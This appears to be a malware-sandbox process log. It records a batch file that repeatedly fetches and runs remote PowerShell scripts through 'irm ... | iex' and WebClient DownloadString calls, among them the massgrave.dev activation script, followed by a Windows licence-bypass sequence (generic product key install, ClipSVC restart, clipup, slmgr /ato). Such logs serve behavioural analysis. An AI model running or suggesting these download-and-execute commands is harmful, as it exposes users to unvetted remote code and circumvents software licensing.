C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic Path Win32_OperatingSystem Get OperatingSystemSKU /format:LIST" 2>nul7⤵PID:4160
-
C:\Windows\System32\wbem\WMIC.exewmic Path Win32_OperatingSystem Get OperatingSystemSKU /format:LIST8⤵PID:1756
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v PROCESSOR_ARCHITECTURE7⤵PID:664
-
C:\Windows\System32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v PROCESSOR_ARCHITECTURE8⤵PID:3336
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ping -n 1 l.root-servers.net7⤵PID:1200
-
C:\Windows\System32\PING.EXEping -n 1 l.root-servers.net8⤵
- Runs ping.exe
PID:1808
-
-
-
C:\Windows\System32\reg.exereg query "HKCU\SOFTWARE\Microsoft\Windows Script Host\Settings" /v Enabled7⤵PID:836
-
-
C:\Windows\System32\find.exefind /i "0x0"7⤵PID:3528
-
-
C:\Windows\System32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows Script Host\Settings" /v Enabled7⤵PID:3668
-
-
C:\Windows\System32\find.exefind /i "0x0"7⤵PID:1260
-
-
C:\Windows\System32\reg.exereg query HKLM\SYSTEM\CurrentControlSet\Services\ClipSVC /v ImagePath7⤵
- Modifies registry key
PID:1596
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query HKLM\SYSTEM\CurrentControlSet\Services\ClipSVC /v Start 2>nul7⤵PID:3824
-
C:\Windows\System32\reg.exereg query HKLM\SYSTEM\CurrentControlSet\Services\ClipSVC /v Start8⤵
- Modifies registry key
PID:588
-
-
-
C:\Windows\System32\sc.exesc start ClipSVC7⤵
- Launches sc.exe
PID:1636
-
-
C:\Windows\System32\sc.exesc query ClipSVC7⤵
- Launches sc.exe
PID:3636
-
-
C:\Windows\System32\reg.exereg query HKLM\SYSTEM\CurrentControlSet\Services\wlidsvc /v ImagePath7⤵
- Modifies registry key
PID:3760
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query HKLM\SYSTEM\CurrentControlSet\Services\wlidsvc /v Start 2>nul7⤵PID:2020
-
C:\Windows\System32\reg.exereg query HKLM\SYSTEM\CurrentControlSet\Services\wlidsvc /v Start8⤵
- Modifies registry key
PID:4536
-
-
-
C:\Windows\System32\sc.exesc start wlidsvc7⤵
- Launches sc.exe
PID:8
-
-
C:\Windows\System32\sc.exesc query wlidsvc7⤵
- Launches sc.exe
PID:1864
-
-
C:\Windows\System32\reg.exereg query HKLM\SYSTEM\CurrentControlSet\Services\sppsvc /v ImagePath7⤵
- Modifies registry key
PID:1712
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query HKLM\SYSTEM\CurrentControlSet\Services\sppsvc /v Start 2>nul7⤵PID:3744
-
C:\Windows\System32\reg.exereg query HKLM\SYSTEM\CurrentControlSet\Services\sppsvc /v Start8⤵
- Modifies registry key
PID:2716
-
-
-
C:\Windows\System32\sc.exesc start sppsvc7⤵
- Launches sc.exe
PID:1584
-
-
C:\Windows\System32\sc.exesc query sppsvc7⤵
- Launches sc.exe
PID:3524
-
-
C:\Windows\System32\reg.exereg query HKLM\SYSTEM\CurrentControlSet\Services\KeyIso /v ImagePath7⤵
- Modifies registry key
PID:3892
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query HKLM\SYSTEM\CurrentControlSet\Services\KeyIso /v Start 2>nul7⤵PID:1360
-
C:\Windows\System32\reg.exereg query HKLM\SYSTEM\CurrentControlSet\Services\KeyIso /v Start8⤵
- Modifies registry key
PID:5016
-
-
-
C:\Windows\System32\sc.exesc start KeyIso7⤵
- Launches sc.exe
PID:4040
-
-
C:\Windows\System32\sc.exesc query KeyIso7⤵
- Launches sc.exe
PID:4552
-
-
C:\Windows\System32\reg.exereg query HKLM\SYSTEM\CurrentControlSet\Services\LicenseManager /v ImagePath7⤵
- Modifies registry key
PID:760
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query HKLM\SYSTEM\CurrentControlSet\Services\LicenseManager /v Start 2>nul7⤵PID:4556
-
C:\Windows\System32\reg.exereg query HKLM\SYSTEM\CurrentControlSet\Services\LicenseManager /v Start8⤵
- Modifies registry key
PID:3412
-
-
-
C:\Windows\System32\sc.exesc start LicenseManager7⤵
- Launches sc.exe
PID:1488
-
-
C:\Windows\System32\sc.exesc query LicenseManager7⤵
- Launches sc.exe
PID:392
-
-
C:\Windows\System32\reg.exereg query HKLM\SYSTEM\CurrentControlSet\Services\Winmgmt /v ImagePath7⤵
- Modifies registry key
PID:2076
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query HKLM\SYSTEM\CurrentControlSet\Services\Winmgmt /v Start 2>nul7⤵PID:3912
-
C:\Windows\System32\reg.exereg query HKLM\SYSTEM\CurrentControlSet\Services\Winmgmt /v Start8⤵
- Modifies registry key
PID:2008
-
-
-
C:\Windows\System32\sc.exesc start Winmgmt7⤵
- Launches sc.exe
PID:2432
-
-
C:\Windows\System32\sc.exesc query Winmgmt7⤵
- Launches sc.exe
PID:4400
-
-
C:\Windows\System32\reg.exereg query HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /v ImagePath7⤵
- Modifies registry key
PID:3772
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /v Start 2>nul7⤵PID:3100
-
C:\Windows\System32\reg.exereg query HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /v Start8⤵
- Modifies registry key
PID:4780
-
-
-
C:\Windows\System32\sc.exesc start wuauserv7⤵
- Launches sc.exe
PID:472
-
-
C:\Windows\System32\sc.exesc query wuauserv7⤵
- Launches sc.exe
PID:3352
-
-
C:\Windows\System32\net.exenet start ClipSVC /y7⤵PID:3396
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start ClipSVC /y8⤵PID:3288
-
-
-
C:\Windows\System32\sc.exesc query ClipSVC7⤵
- Launches sc.exe
PID:3312
-
-
C:\Windows\System32\find.exefind /i "4 RUNNING"7⤵PID:4876
-
-
C:\Windows\System32\sc.exesc start ClipSVC7⤵
- Launches sc.exe
PID:4340
-
-
C:\Windows\System32\net.exenet start wlidsvc /y7⤵PID:3316
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start wlidsvc /y8⤵PID:4268
-
-
-
C:\Windows\System32\sc.exesc query wlidsvc7⤵
- Launches sc.exe
PID:3852
-
-
C:\Windows\System32\find.exefind /i "4 RUNNING"7⤵PID:4136
-
-
C:\Windows\System32\sc.exesc start wlidsvc7⤵
- Launches sc.exe
PID:1700
-
-
C:\Windows\System32\net.exenet start sppsvc /y7⤵PID:4908
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start sppsvc /y8⤵PID:948
-
-
-
C:\Windows\System32\sc.exesc query sppsvc7⤵
- Launches sc.exe
PID:3000
-
-
C:\Windows\System32\find.exefind /i "4 RUNNING"7⤵PID:876
-
-
C:\Windows\System32\sc.exesc start sppsvc7⤵
- Launches sc.exe
PID:3544
-
-
C:\Windows\System32\net.exenet start KeyIso /y7⤵PID:4752
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start KeyIso /y8⤵PID:2416
-
-
-
C:\Windows\System32\sc.exesc query KeyIso7⤵
- Launches sc.exe
PID:3012
-
-
C:\Windows\System32\find.exefind /i "4 RUNNING"7⤵PID:3748
-
-
C:\Windows\System32\sc.exesc start KeyIso7⤵
- Launches sc.exe
PID:4128
-
-
C:\Windows\System32\net.exenet start LicenseManager /y7⤵PID:4912
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start LicenseManager /y8⤵PID:4176
-
-
-
C:\Windows\System32\sc.exesc query LicenseManager7⤵
- Launches sc.exe
PID:648
-
-
C:\Windows\System32\find.exefind /i "4 RUNNING"7⤵PID:2600
-
-
C:\Windows\System32\sc.exesc start LicenseManager7⤵
- Launches sc.exe
PID:1476
-
-
C:\Windows\System32\net.exenet start Winmgmt /y7⤵PID:4260
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start Winmgmt /y8⤵PID:208
-
-
-
C:\Windows\System32\sc.exesc query Winmgmt7⤵
- Launches sc.exe
PID:4264
-
-
C:\Windows\System32\find.exefind /i "4 RUNNING"7⤵PID:1944
-
-
C:\Windows\System32\sc.exesc start Winmgmt7⤵
- Launches sc.exe
PID:1224
-
-
C:\Windows\System32\net.exenet start wuauserv /y7⤵PID:4616
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start wuauserv /y8⤵PID:2792
-
-
-
C:\Windows\System32\sc.exesc query wuauserv7⤵
- Launches sc.exe
PID:2956
-
-
C:\Windows\System32\find.exefind /i "4 RUNNING"7⤵PID:2444
-
-
C:\Windows\System32\sc.exesc start wuauserv7⤵
- Launches sc.exe
PID:3376
-
-
C:\Windows\System32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\State"7⤵PID:3696
-
-
C:\Windows\System32\find.exefind /i "IMAGE_STATE_COMPLETE"7⤵PID:380
-
-
C:\Windows\System32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinPE" /v InstRoot7⤵PID:3788
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe $ExecutionContext.SessionState.LanguageMode7⤵
- Suspicious behavior: EnumeratesProcesses
PID:2636
-
-
C:\Windows\System32\find.exefind /i "Full"7⤵PID:2164
-
-
C:\Windows\System32\wbem\WMIC.exewmic path Win32_ComputerSystem get CreationClassName /value7⤵PID:3528
-
-
C:\Windows\System32\find.exefind /i "computersystem"7⤵PID:4516
-
-
C:\Windows\System32\Dism.exeDISM /English /Online /Get-CurrentEdition7⤵
- Drops file in Windows directory
PID:2192 -
C:\Users\Admin\AppData\Local\Temp\5A431E42-5DDD-49D6-8EB5-5C75CAA3C54E\dismhost.exeC:\Users\Admin\AppData\Local\Temp\5A431E42-5DDD-49D6-8EB5-5C75CAA3C54E\dismhost.exe {8E613867-8844-4BA0-B2C9-5CE13C539D9A}8⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
PID:3600
-
-
-
C:\Windows\System32\cmd.execmd /c exit /b 07⤵PID:3372
-
-
C:\Windows\System32\cscript.execscript //nologo C:\Windows\system32\slmgr.vbs /dlv7⤵PID:3524
-
-
C:\Windows\System32\cmd.execmd /c exit /b 07⤵PID:5016
-
-
C:\Windows\System32\reg.exereg query "HKU\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\PersistedTSReArmed"7⤵PID:4076
-
-
C:\Windows\System32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ClipSVC\Volatile\PersistedSystemState"7⤵PID:1440
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /v "SkipRearm" 2>nul7⤵PID:4992
-
C:\Windows\System32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /v "SkipRearm"8⤵PID:3004
-
-
-
C:\Windows\System32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Plugins\Objects\msft:rm/algorithm/hwid/4.0" /f ba02fed39662 /d7⤵PID:1008
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path SoftwareLicensingProduct where (ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f') get ID /VALUE" 2>nul7⤵PID:3556
-
C:\Windows\System32\wbem\WMIC.exewmic path SoftwareLicensingProduct where (ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f') get ID /VALUE8⤵PID:392
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /v TokenStore 2>nul7⤵PID:3664
-
C:\Windows\System32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /v TokenStore8⤵PID:116
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo: "7⤵PID:4768
-
-
C:\Windows\System32\findstr.exefindstr /i "wuauserv"7⤵PID:4400
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /v Start 2>nul7⤵PID:4620
-
C:\Windows\System32\reg.exereg query HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /v Start8⤵
- Modifies registry key
PID:4780
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /v Start 2>nul7⤵PID:1116
-
C:\Windows\System32\reg.exereg query HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /v Start8⤵
- Modifies registry key
PID:1040
-
-
-
C:\Windows\System32\reg.exereg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v SettingsPageVisibility7⤵
- Modifies registry key
PID:4336
-
-
C:\Windows\System32\find.exefind /i "windowsupdate"7⤵PID:3660
-
-
C:\Windows\System32\reg.exereg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdateSysprepInProgress7⤵
- Modifies registry key
PID:3732
-
-
C:\Windows\System32\reg.exereg query HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate /s7⤵
- Modifies registry key
PID:1196
-
-
C:\Windows\System32\findstr.exefindstr /i "NoAutoUpdate DisableWindowsUpdateAccess"7⤵PID:3312
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo: "7⤵PID:3520
-
-
C:\Windows\System32\find.exefind /i "wuauserv"7⤵PID:4724
-
-
C:\Windows\System32\reg.exereg query "HKLM\SOFTWARE\Policies\Microsoft\WindowsStore" /v DisableStoreApps7⤵PID:4980
-
-
C:\Windows\System32\find.exefind /i "0x1"7⤵PID:3316
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v BuildBranch 2>nul7⤵PID:4136
-
C:\Windows\System32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v BuildBranch8⤵PID:5036
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo "040fa323-92b1-4baf-97a2-5b67feaefddb 0724cb7d-3437-4cb7-93cb-830375d0079d 0ad2ac98-7bb9-4201-8d92-312299201369 1a9a717a-cf13-4ba5-83c3-0fe25fa868d5 221a02da-e2a1-4b75-864c-0a4410a33fdf 291ece0e-9c38-40ca-a9e1-32cc7ec19507 2936d1d2-913a-4542-b54e-ce5a602a2a38 2c293c26-a45a-4a2a-a350-c69a67097529 2de67392-b7a7-462a-b1ca-108dd189f588 2ffd8952-423e-4903-b993-72a1aa44cf82 30a42c86-b7a0-4a34-8c90-ff177cb2acb7 345a5db0-d94f-4e3b-a0c0-7c42f7bc3ebf 3502365a-f88a-4ba4-822a-5769d3073b65 377333b1-8b5d-48d6-9679-1225c872d37c 3df374ef-d444-4494-a5a1-4b0d9fd0e203 3f1afc82-f8ac-4f6c-8005-1d233e606eee 49cd895b-53b2-4dc4-a5f7-b18aa019ad37 4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c 4f3da0d2-271d-4508-ae81-626b60809a38 60b3ec1b-9545-4921-821f-311b129dd6f6 613d217f-7f13-4268-9907-1662339531cd 62f0c100-9c53-4e02-b886-a3528ddfe7f6 6365275e-368d-46ca-a0ef-fc0404119333 721f9237-9341-4453-a661-09e8baa6cca5 73111121-5638-40f6-bc11-f1d7b0d64300 7a802526-4c94-4bd1-ba14-835a1aca2120 7cb546c0-c7d5-44d8-9a5c-69ecdd782b69 82bbc092-bc50-4e16-8e18-b74fc486aec3 8ab9bdd1-1f67-4997-82d9-8878520837d9 8b351c9c-f398-4515-9900-09df49427262 90da7373-1c51-430b-bf26-c97e9c5cdc31 95dca82f-385d-4d39-b85b-5c73fa285d6f a48938aa-62fa-4966-9d44-9f04da3f72f2 b0773a15-df3a-4312-9ad2-83d69648e356 b4bfe195-541e-4e64-ad23-6177f19e395e b68e61d2-68ca-4757-be45-0cc2f3e68eee bd3762d7-270d-4760-8fb3-d829ca45278a c86d5194-4840-4dae-9c1c-0301003a5ab0 d552befb-48cc-4327-8f39-47d2d94f987c d6eadb3b-5ca8-4a6b-986e-35b550756111 df96023b-dcd9-4be2-afa0-c6c871159ebe e0c42288-980c-4788-a014-c080d2e1926e e4db50ea-bda1-4566-b047-0ca50abc6f07 e558417a-5123-4f6f-91e7-385c1c7ca9d4 e7a950a2-e548-4f10-bf16-02ec848e0643 eb6d346f-1c60-4643-b960-40ec31596c45 ec868e65-fadf-4759-b23e-93fe37f2cc29 ef51e000-2659-4f25-8345-3de70a9cf4c4 f7af7d09-40e4-419c-a49b-eae366689ebd fa755fe6-6739-40b9-8d84-6d0ea3b6d1ab fe74f55b-0338-41d6-b267-4a201abe7285" "7⤵PID:1788
-
-
C:\Windows\System32\find.exefind /i "4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c"7⤵PID:3000
-
-
C:\Windows\System32\wbem\WMIC.exewmic path SoftwareLicensingService where __CLASS='SoftwareLicensingService' call InstallProductKey ProductKey="VK7JG-NPHTM-C97JM-9MPGT-3V66T"7⤵PID:5028
-
-
C:\Windows\System32\cmd.execmd /c exit /b 07⤵PID:4128
-
-
C:\Windows\System32\wbem\WMIC.exewmic path SoftwareLicensingService where __CLASS='SoftwareLicensingService' call RefreshLicenseStatus7⤵PID:4912
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKCU\Control Panel\International\Geo" /v Name 2>nul7⤵PID:3200
-
C:\Windows\System32\reg.exereg query "HKCU\Control Panel\International\Geo" /v Name8⤵PID:696
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKCU\Control Panel\International\Geo" /v Nation 2>nul7⤵PID:1832
-
C:\Windows\System32\reg.exereg query "HKCU\Control Panel\International\Geo" /v Nation8⤵PID:2416
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell.exe [convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes("""OSMajorVersion=5;OSMinorVersion=1;OSPlatformId=2;PP=0;Pfn=Microsoft.Windows.48.X19-98841_8wekyb3d8bbwe;DownlevelGenuineState=1;$([char]0)"""))7⤵PID:648
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe [convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes("""OSMajorVersion=5;OSMinorVersion=1;OSPlatformId=2;PP=0;Pfn=Microsoft.Windows.48.X19-98841_8wekyb3d8bbwe;DownlevelGenuineState=1;$([char]0)"""))8⤵
- Suspicious behavior: EnumeratesProcesses
PID:2924
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo "TwBTAE0AYQBqAG8AcgBWAGUAcgBzAGkAbwBuAD0ANQA7AE8AUwBNAGkAbgBvAHIAVgBlAHIAcwBpAG8AbgA9ADEAOwBPAFMAUABsAGEAdABmAG8AcgBtAEkAZAA9ADIAOwBQAFAAPQAwADsAUABmAG4APQBNAGkAYwByAG8AcwBvAGYAdAAuAFcAaQBuAGQAbwB3AHMALgA0ADgALgBYADEAOQAtADkAOAA4ADQAMQBfADgAdwBlAGsAeQBiADMAZAA4AGIAYgB3AGUAOwBEAG8AdwBuAGwAZQB2AGUAbABHAGUAbgB1AGkAbgBlAFMAdABhAHQAZQA9ADEAOwAAAA==" "7⤵PID:2232
-
-
C:\Windows\System32\find.exefind "AAAA"7⤵PID:4736
-
-
C:\Windows\System32\net.exenet stop ClipSVC /y7⤵PID:1668
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ClipSVC /y8⤵PID:1756
-
-
-
C:\Windows\System32\net.exenet start ClipSVC /y7⤵PID:4260
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start ClipSVC /y8⤵PID:1188
-
-
-
C:\Windows\System32\ClipUp.execlipup -v -o7⤵PID:1260
-
C:\Windows\System32\clipup.execlipup -v -o -ppl C:\Users\Admin\AppData\Local\Temp\tem9F87.tmp8⤵
- Checks SCSI registry key(s)
PID:2320
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly(4, 1); $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule(2, $False); $TypeBuilder = $ModuleBuilder.DefineType(0); $meth = $TypeBuilder.DefinePInvokeMethod('BrandingFormatString', 'winbrand.dll', 'Public, Static', 1, [String], @([String]), 1, 3); $meth.SetImplementationFlags(128); $TypeBuilder.CreateType()::BrandingFormatString('%WINDOWS_LONG%')"7⤵PID:2192
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly(4, 1); $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule(2, $False); $TypeBuilder = $ModuleBuilder.DefineType(0); $meth = $TypeBuilder.DefinePInvokeMethod('BrandingFormatString', 'winbrand.dll', 'Public, Static', 1, [String], @([String]), 1, 3); $meth.SetImplementationFlags(128); $TypeBuilder.CreateType()::BrandingFormatString('%WINDOWS_LONG%')8⤵
- Suspicious behavior: EnumeratesProcesses
PID:404
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo "Windows 10 Pro" "7⤵PID:4556
-
-
C:\Windows\System32\find.exefind /i "Windows"7⤵PID:576
-
-
C:\Windows\System32\wbem\WMIC.exewmic path SoftwareLicensingProduct where "ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f' and PartialProductKey<>null" call Activate7⤵PID:236
-
-
C:\Windows\System32\cscript.execscript //nologo C:\Windows\system32\slmgr.vbs /ato7⤵PID:4520
-
-
-
-
-
-
-
C:\Windows\system32\Clipup.exe"C:\Windows\system32\Clipup.exe" -o1⤵PID:1928
-
C:\Windows\system32\Clipup.exe"C:\Windows\system32\Clipup.exe" -o -ppl C:\Windows\TEMP\tem9B60.tmp2⤵
- Checks SCSI registry key(s)
PID:1652
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\test.bat" "1⤵PID:856
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "irm github.com/SteavenToolBox/Windows/raw/main/SteavenToolBox.ps1 | iex2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:3636 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\windows\temp\SteavenToolBox.cmd3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3824 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\windows\temp\SteavenToolBox.cmd""4⤵PID:984
-
C:\Windows\system32\reg.exeReg.exe query "HKU\S-1-5-19\Environment"5⤵PID:3892
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "VerboseStatus" /t REG_DWORD /d "1" /f5⤵PID:4552
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe "iex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/SteavenToolBox/Windows/main/Scripts/runtime.ps1'))"5⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:2804 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xervzavd\xervzavd.cmdline"6⤵PID:5104
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES40C3.tmp" "c:\Users\Admin\AppData\Local\Temp\xervzavd\CSCE3F57D1BF664A5BB386F1C183351A73.TMP"7⤵PID:4668
-
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2804 -s 28926⤵
- Program crash
PID:4992
-
-
-
C:\Windows\system32\wsl.exewsl --install5⤵
- Drops file in Windows directory
PID:876 -
C:\Users\Admin\AppData\Local\Temp\CE4C1331-8811-4D12-8314-209CDDFBE3DF\dismhost.exeC:\Users\Admin\AppData\Local\Temp\CE4C1331-8811-4D12-8314-209CDDFBE3DF\dismhost.exe {D8515B2B-58EA-49FC-BCEE-748023591695}6⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
PID:4600
-
-
-
-
-
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:1300
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 452 -p 2804 -ip 28041⤵PID:5040
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Checks SCSI registry key(s)
PID:3108
-
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:21⤵PID:1116
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\test.bat" "1⤵PID:3588
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "irm github.com/SteavenToolBox/Windows/raw/main/SteavenToolBox.ps1 | iex2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:4824 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\windows\temp\SteavenToolBox.cmd3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4696 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\windows\temp\SteavenToolBox.cmd""4⤵PID:4360
-
C:\Windows\system32\reg.exeReg.exe query "HKU\S-1-5-19\Environment"5⤵PID:868
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "VerboseStatus" /t REG_DWORD /d "1" /f5⤵PID:2700
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe "iex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/SteavenToolBox/Windows/main/Scripts/runtime.ps1'))"5⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:1856 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1856 -s 32006⤵
- Program crash
PID:1316
-
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\test.bat" "1⤵PID:4800
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "irm github.com/SteavenToolBox/Windows/raw/main/SteavenToolBox.ps1 | iex2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:2308 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\windows\temp\SteavenToolBox.cmd3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2588 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\windows\temp\SteavenToolBox.cmd""4⤵PID:4728
-
C:\Windows\system32\reg.exeReg.exe query "HKU\S-1-5-19\Environment"5⤵PID:4432
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "VerboseStatus" /t REG_DWORD /d "1" /f5⤵PID:3240
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "irm https://massgrave.dev/get | iex"5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:5072 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Windows\Temp\MAS_980.cmd" "6⤵PID:2660
-
C:\Windows\System32\findstr.exefindstr /rxc:".*" "MAS_980.cmd"7⤵PID:2376
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ver7⤵PID:4076
-
-
C:\Windows\System32\reg.exereg query "HKCU\Console" /v ForceV27⤵PID:4864
-
-
C:\Windows\System32\find.exefind /i "0x0"7⤵PID:4572
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c echo prompt $E | cmd7⤵PID:4288
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo prompt $E "8⤵PID:2796
-
-
C:\Windows\System32\cmd.execmd8⤵PID:4688
-
-
-
